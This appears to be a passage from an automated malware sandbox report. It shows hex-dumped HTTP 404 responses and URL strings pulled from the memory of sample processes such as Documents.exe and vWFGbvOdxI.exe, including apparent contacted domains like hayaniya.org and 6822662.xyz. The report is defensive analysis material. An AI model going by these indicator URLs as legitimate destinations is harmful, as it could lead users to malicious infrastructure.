6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 Data Ascii: 59e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/c
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:16:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:16:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:16:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:16:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:16:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:16:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:16:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                    Source: systray.exe, 00000011.00000002.4500910385.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: systray.exe, 00000011.00000002.4500910385.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.000000000352A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Documents.exe, 00000000.00000002.2154688065.0000000003376000.00000004.00000800.00020000.00000000.sdmp, uFEeKIucsX.exe, 0000000A.00000002.2277213173.00000000028E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/047a40599547.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/067b299930.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/068e399928.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/069a299928.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/128c40599466.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/129d40599465.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/14a40599580.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/178b40599416.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/209d40599385.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/289d399707.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/444d40599150.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/449a40599145.html
